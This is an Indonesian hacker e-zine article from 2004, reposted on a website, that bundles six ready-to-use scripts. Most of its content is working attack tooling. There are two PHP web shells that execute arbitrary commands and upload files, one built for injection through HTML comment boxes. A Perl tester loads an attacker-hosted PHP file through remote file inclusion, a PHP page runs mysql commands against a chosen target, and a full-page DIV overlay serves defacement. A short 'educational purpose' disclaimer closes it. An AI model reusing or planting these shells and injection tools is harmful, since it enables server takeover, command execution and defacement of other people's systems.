Copy Link
Add to Bookmark
Report

Echo Magazine Issue 09 Phile 0x013

eZine's profile picture
Published in 
Echo Magazine
 · 4 years ago

  




- ____________________ ___ ___ ________
--\_ _____/\_ ___ \ / | \\_____ \--
-| __)_ / \ \// ~ \/ | \--
-| \\ \___\ Y / | \--
-/_______ / \______ /\___|_ /\_______ /-
- -\/ -\/ -\/ -\/-


.OR.ID
ECHO-ZINE RELEASE 09

Author: y3dips && K-159
Online @ www.echo.or.id :: http://ezine.echo.or.id


== ECHO Skrapt 2004 ==

01./Catet info browser dan IP >dot< php ~[ y3dips ]
02./Uplod File && $hell command via browser >dot< php ~[ y3dips ]
03.\General PHP injection Testing script >dot< perl ~[ y3dips ]
04.|MySQL management under web ~[ K-159 ]
05.\PHP upload file in HTML rulez.. ~[ K-159 ]
06.\using DIV to manipulating all of the page area :) (*smart enough isnt it) ~[k-159 ]

.: BEGIN

+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++


01. Skrip Untuk Mencatat IP dan INFO BROWSER

By : y3dips
Language : PHP
Resource : Buku php , from phpinfo(); (to get the variable)
Published: http://geocities.com/y3d1ps/scrapt/catatip.php.txt
Comment : skrip ini dibuat dengan bahasa pemrograman PHP , pd awalnya di gunakan pada
situs echo.or.id , untuk halaman index-nya


/*----- snip -----


<html>
<head>
<title> catet info browser dan ip </title>
<?php
if($HTTP_VIA == "")
printf("<div align= center>%s ::
diakses dari<i><b> ip </b></i> <b>$REMOTE_ADDR</b><br> dengan <i><b> browser</b></i>
<b> $HTTP_USER_AGENT</b> </div>",date("D, d F Y"));

else
printf("<div align= center>%s ::
</b> diakses dari<i><b> ip </b></i> <b>$HTTP_X_FORWARDED_FOR</b><br> dengan <i><b> browser</b></i>
<b>$HTTP_USER_AGENT</B> melalui <b>$HTTP_VIA</b> dengan ip <i>$REMOTE_ADDR</i></div>",date("D, d F Y"));
?>
</p>
</body>
</html>


------- snip -----*/






+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++







02. Uplod File && $hell command via browser >dot< php ~[ y3dips ]

By : y3dips
Language : PHP
Resource : .....PHP book, PHP manual <dot> chm
Published: ....
Comment : skrip ini dibuat dengan bahasa pemrograman PHP , digunakan sebagai halaman
untuk mengupload file dan eksekusi $hell command via browser , dengan beberapa
settingan 'tertentu' yang di "allow" pada php.ini dan httpd.conf

/*----- snip -----

<!-- upload php shell made by y3dips (echo.or.id) for test only -->
<!-- greetz to K-159 ,the_day, z3r0byt3, m0by , comex, c-a-s-e , S'to -->
<html>
<head>
<title>#E-C-H-O Upl0ad $hell</title>
</head>
<BODY bgcolor="#000000">
<!-- ngatur direktori -->
<? if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); } ?>
<table>
<tr><td bgcolor=#cccccc>

<!-- eksekusi command dengan passthru -->

<?
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la ; pwd ;id "; }
echo "<b>";
echo "<div align=left><textarea name=report cols=70 rows=15>";
echo "".passthru($_POST['cmd'])."";
echo "</textarea></div>";
echo "</b>";
?>
</td></tr></table>
<!-- upload file -->
<?
if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"]))
{
copy($HTTP_POST_FILES["filenyo"][tmp_name],
$_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name])
or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=arial>
<div>file gak isa di uplod ".$HTTP_POST_FILES["filenyo"][name]."</div></font></td></tr></table>");
}
?>
<table width=100% cellpadding=0 cellspacing=0 >
<tr><td>

<!-- form eksekusi command -->

<?
echo "<form name=command method=post>";
echo "<font face=Verdana size=1 color=red>";
echo "<b>[CmD ]</b><input type=text name=cmd size=33> ";
if ((!$_POST['dir']) OR ($_POST['dir']==""))
{ echo " <b>[Dir]</b><input type=text name=dir size=40 value=".exec("pwd").">"; }
else { echo "<input type=text name=dir size=40 value=".$_POST['dir'].">"; }
echo " <input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 >

<!-- form upload -->

<?
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo "<font face=Verdana size=1 color=red>";
echo "<b> [EcHo]</b>";
echo "<input type=file name=filenyo size=70> ";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=70 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=70 value=".$_POST['dir'].">"; }
echo "<input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
</html>


------- snip -----*/






+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++






03.\General PHP injection Testing script


By : y3dips
Language : PeRl
Resource : http://ezine.echo.or.id/ezine8/ez-r08-y3dips-becommunityeXplo.txt
Published: ... in this ezine
Comment : Skrip ini dibuat untuk testing remote injection terhadap php vuln
sebenarnya untuk menggantikan fungsi browser , khususnya lagi dikembangkan
dengan menggunakan file sebagai database target *_^




Petunjuk :

masukkan lengkap path target yang vulnerable sesuai vulnerablenya, misal :
$target = www.dudul.com/index.php?pageurl=

serta path lengkap exploit filenya (read about injection script in attacker side)
$xploit = www.keren.com/echo.txt


dan yang perlu dilakukan dalam inputan adalah
perl xplo.pl http://www.dudul.com/index.php?pageurl= www.keren.com/echo.txt


/*----- snip -----

# xplo.pl
#!/usr/bin/perl -w
# Remote Testing PHP injection by y3dips [for testing only]

print " * Remote Testing PHP injection by y3dips *\n";

require LWP::UserAgent;

if(@ARGV == 2)
{

$target= $ARGV[0];
$xploit= $ARGV[1];

my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$url = "http://$target$xploit";

my $injek = $ua->get($url);

print "---------------------------------------------------\n";

if ($injek->is_success)
{ print (" Sepertinya Vulnerable\n"); }
else { print (" Sepertinya Tidak Vulnerable\n"); }

print "---------------------------------------------------\n";

}

else{
print "Gunakan: perl $0 [path vulnerable] [path xplo] \n";
}



=====================


echo.txt


-- cut --

<?
echo "".passthru(' id ')."";
?>

-- cut --

------- snip -----*/






+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++







04.\MySQL management under web


By : k-159
Language : Php
Resource : ..., based on explorer 1.4 lost noobs
Published: ... in this ezine
Comment : Manage SQL under web base


/*----- snip -----


<!-- sql remote injection script by K-159 -->
<!-- @t http://aikmel.com en http://echo.or.id -->
<!-- based on explorer 1.4 lost noobs -->

<html>
<head><title>.:You Landed on K-159 Project:.</title>
<body bgcolor="blue">

<?

echo("
<FORM ENCTYPE=\"multipart/form-data\" METHOD=POST>
<br><br><hr><br><br>

Enter mysql client binary <br>
<input name=\"sql_client\" type=\"text\" value=\"mysql\">

<br><br>Enter the login<br>
<input name=\"sql_login\" type=\"text\" value=\"root\">

<br><br>Enter the password<br>
<input name=\"sql_password\" type=\"text\" value=\"none\">

<br><br>Enter address of target<br>
<input name=\"sql_host\" type=\"text\" value=\"Provide a target\">

<bR><br>Enter other port of mysql<br>
<input name=\"sql_options\" type=\"text\" value=\"\">


<br><br>Enter valid SQL queries<br>
<TEXTAREA input name=\"sql_query\" ROWS=10 COLS=35>SHOW DATABASES;
# USE database_name; SHOW TABLES;
# SELECT * FROM table_name;</TEXTAREA>

<br><br><input name=\"submit\" type=\"submit\" value=\"Send !\">
<br><br><hr>
</font></form>

");


if($sql_client)
{
if ($sql_host == "Provide a target") // This checks that a target is set
{
echo("Please provide a valid target."); // No target is set
}
else if($sql_password == "none") // Ok for target, processing if no password is set
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------

");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); }
echo("</TEXTAREA>");
}

else // processing when target is ok and when a password is provided
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --password=$sql_password --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------

");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); }
echo("</TEXTAREA>");
} // end of else
}

?>
</html>

------- snip -----*/







+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++







05.\PHP upload file in HTML rulez..


By : k-159
Language : HTML
Resource : ...,
Published: ... in this ezine
Comment : skrip ini dibuat saat mencoba membuat upload skrip dengan menumpang di box (comment,
input) yang bisa hanya di inputkan html , but the server allow to execute php :)


/*----- snip -----

<html>
<head>
<title>K-159 Project</title>
</head>
<BODY bgcolor="#000000">


<script language="php">
if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
</script>
<table>
<tr><td bgcolor=#cccccc>

<script language="php">
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la ;uname -ar;pwd ;id;cat /etc/hosts "; }
echo "<b>";
echo "<div align=left><textarea name=report cols=70 rows=15>";
echo "".passthru($_POST['cmd'])."";
echo "</textarea></div>";
echo "</b>";
</script>
</td></tr></table>

<script language="php">
if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"]))
{
copy($HTTP_POST_FILES["filenyo"][tmp_name],
$_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name])
or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=arial>
<div>file [ ".$HTTP_POST_FILES["filenyo"][name]." ] Error Cuk !!
!!</div></font></td></tr></table>");
}
</script>
<table width=100% cellpadding=0 cellspacing=0 >
<tr><td>

<script language="php">
echo "<form name=command method=post>";
echo "<font face=Verdana size=1 color=red>";
echo "<b>[CmD ]</b><input type=text name=cmd size=33> ";
if ((!$_POST['dir']) OR ($_POST['dir']==""))
{ echo " <b>[Dir]</b><input type=text name=dir size=40 value=".exec("pwd").">"; }
else { echo "<input type=text name=dir size=40 value=".$_POST['dir'].">"; }
echo " <input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
</script>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 >

<script language="php">
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo "<font face=Verdana size=1 color=red>";
echo "<b> [EcHo]</b>";
echo "<input type=file name=filenyo size=70> ";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=70 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=70 value=".$_POST['dir'].">"; }
echo "<input type=submit name=submit value=\"0k\">";
echo "</font>";
echo "</form>";
</script>
</td></tr></table>
</html>
------- snip -----*/







+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++







06.\using DIV to manipulating all of the page area :) (*smart enough isnt it? )


By : k-159
Language : HTML
Resource : ...,
Published: ... in this ezine
Comment : skrip ini digunakan untuk menutupi seluruh skrip lainnya (dengan penggunaan DIV)


Petunjuk : letakkan potongan skrip ini di atas kode " page anda " :D


/*----- snip -----

<div id="Layer1" style="position:absolute; left:0; top:0; width:4000; height:4090;
z-index:1; background-color: #000000; layer-background-color: #ccccc; border: 1px none #000000">

------- snip -----*/



+++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++





Disclamier:

all script on this article for educational purpose, echo.or.id does not accept responsibility
for any damage or injury caused as a result of its use


*greetz to:

anak anak newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel
all $ecurity Industry 1n INDONESIA

kirimkan kritik && saran ke echostaff[at]echo<dot>or<dot>id


← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT